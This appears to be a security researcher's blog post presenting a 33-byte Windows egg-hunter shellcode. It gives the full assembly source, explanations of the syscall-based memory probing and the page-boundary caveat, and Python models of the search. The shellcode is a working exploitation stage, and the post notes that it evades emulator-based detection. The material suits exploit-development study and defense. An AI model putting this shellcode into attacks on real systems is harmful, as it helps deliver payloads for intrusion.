For a current collaboration on taking down yet another botnet, I had to write a very small shellcode. Thanks to some ideas from Understanding Windows Shellcode by skape, I managed to write an egg search shellcode in 33 bytes.
The general idea of the AddAtomA int 2e memory testing was public, but the best implementation I could find was 40 bytes long (skape's) and had the limitation of requiring an executable marker. This one is 33 bytes long and you can choose any four-byte marker you want. If we didn't start the search at address 0, we could save two more bytes and get down to 31, but that makes the search a lot slower. There is a 32-byte version by skape that requires a page-aligned 2nd stage, which is not really comparable because it again requires an executable marker and a 2nd stage injection of at least 4 KB with a long marker sled. Still, I first got the int 2e idea from his paper, so credit to him for that.
The only real limitation of this shellcode is that your second stage must not start within the first four bytes of a page. The theoretical probability of that is < 0.1% (4 out of 4096 offsets in a page), and with heap allocator designs in mind it is even less probable. If this is a severe stability limitation for you, there are two solutions:
- Use an executable marker and put it in front of the shellcode twice. Usually, it will trigger in the first four bytes and jump into the second marker. If it really is page aligned, it will jump right after the second marker.
- Use any (non-executable) marker and put a second marker with a relative jump to your shellcode after the shellcode.
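The < 0.1% figure for the page-boundary limitation can be checked with a few lines of Python. This is only a sketch for illustration: it assumes the usual 4096-byte x86 page size, and the helper name in_first_four_bytes is made up here and is not part of the shellcode. It applies the same 0x0ffc mask as the test dx, 0x0ffc instruction to every offset in one page and counts how many offsets get skipped.

```python
PAGE_SIZE = 4096  # assumption: standard 4 KB x86 page


def in_first_four_bytes(address: int) -> bool:
    """Model of `test dx, 0x0ffc` followed by `jz`.

    ZF is set when bits 2..11 of the address are all clear,
    i.e. the offset within the page is 0, 1, 2 or 3.
    """
    return (address & 0x0FFC) == 0


# Offsets within one page that the search refuses to examine.
skipped = [off for off in range(PAGE_SIZE) if in_first_four_bytes(off)]

# Chance that a uniformly placed second stage starts on a skipped offset.
probability = len(skipped) / PAGE_SIZE

print(skipped)
print(f"{probability:.4%}")
```

A uniform distribution over page offsets is the pessimistic case; allocators that align blocks and prepend headers make a second stage at offsets 0 to 3 rarer still.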
This shellcode is 100% position independent without any GetPC sequence, so it won't be detected by libemu and similar things (although this wasn't a design goal but just a side effect). The second stage shellcode can also be implemented without any GetPC sequence, as it gets its own address passed in edx.
There is a weird inc ebx instruction at the end of the shellcode, but for a good reason: If this eggsearch shellcode lies in memory before the actual shellcode, our search will stop at the imm32 of the cmp r/m32, imm32 instruction and the jmp edx will go to the next instruction, jne (= jnz) address_loop. The inc ebx ensures that ZF is not set (unless we're very unlucky and our exploitation environment had the otherwise unused ebx register set to 0xffffffff) and thus our search continues at the next address.
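The flag argument for inc ebx can be modelled in Python. The function below is a hypothetical helper written for this explanation, not code from the shellcode. It mimics a 32-bit increment and reports whether the zero flag would end up set, which only happens when the register wraps around to 0.

```python
def inc32_sets_zf(ebx: int) -> bool:
    """Return True if `inc ebx` would leave ZF set for this 32-bit value."""
    result = (ebx + 1) & 0xFFFFFFFF  # 32-bit wrap-around, like the real register
    return result == 0


# Only one of the 2**32 possible register values sets ZF.
for value in (0x00000000, 0x00000001, 0x7FFFFFFF, 0xFFFFFFFF):
    print(hex(value), inc32_sets_zf(value))
```

So if the search finds its own imm32 and control falls into the jne, the jump is taken for every ebx value except 0xffffffff.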
; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski

marker equ 0x1f217767 ; 'gw!\x1f'

start:
    xor edx, edx ; edx = 0, pointer to examined address

address_loop:
    inc edx ; edx++, try next address

pagestart_check:
    test dx, 0x0ffc ; are we within the first 4 bytes of a page?
    jz address_loop ; if so, try next address as previous page might be unreadable
                    ; and the cmp [edx-4], marker might result in a segmentation fault

access_check:
    push edx ; save across syscall
    push byte 8 ; eax = 8, syscall nr of AddAtomA
    pop eax ; ^
    int 0x2e ; fire syscall (eax = 8, edx = ptr)
    cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy)
    pop edx ;
    je address_loop ; jmp if result was 0xc0000005

egg_check:
    cmp dword [edx-4], marker ; is our egg right before examined address?
    jne address_loop ; if not, try next address

egg_execute:
    inc ebx ; make sure, zf is not set
    jmp edx ; we found our egg at [edx-4], so we can jmp to edx
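For readers who want to follow the control flow without an assembler, here is a rough Python model of the search loop in the listing above. It is a simulation under stated assumptions, not a port. Memory is a dict from page index to 4096 bytes, and a missing page stands in for the 0xc0000005 result of the syscall. The find_egg function and its limit parameter are invented for this sketch; the real loop has no upper bound.

```python
import struct
from typing import Dict, Optional

PAGE_SIZE = 4096  # assumption: standard 4 KB x86 page
MARKER = struct.pack("<I", 0x1F217767)  # little-endian: 'g', 'w', '!', 0x1f


def find_egg(pages: Dict[int, bytes], limit: int) -> Optional[int]:
    """Return the first address whose preceding four bytes equal MARKER."""
    addr = 0                                  # start: xor edx, edx
    while True:
        addr += 1                             # address_loop: inc edx
        if addr >= limit:                     # not in the shellcode, keeps the model finite
            return None
        if (addr & 0x0FFC) == 0:              # pagestart_check: skip offsets 0..3
            continue
        page = pages.get(addr // PAGE_SIZE)   # access_check: is the page mapped?
        if page is None:                      # models the 0xc0000005 result
            continue
        off = addr % PAGE_SIZE
        if page[off - 4:off] == MARKER:       # egg_check: cmp dword [edx-4], marker
            return addr                       # egg_execute: jmp edx


# Usage: one mapped page (index 3) with the marker at offset 100.
page = bytearray(PAGE_SIZE)
page[100:104] = MARKER
pages = {3: bytes(page)}
print(hex(find_egg(pages, 8 * PAGE_SIZE)))  # address right after the marker
```

Because offsets 0 to 3 are skipped, off - 4 never reaches into the previous page. That is the reason for the page start check in the listing, and it is also why a second stage starting at those offsets is never found.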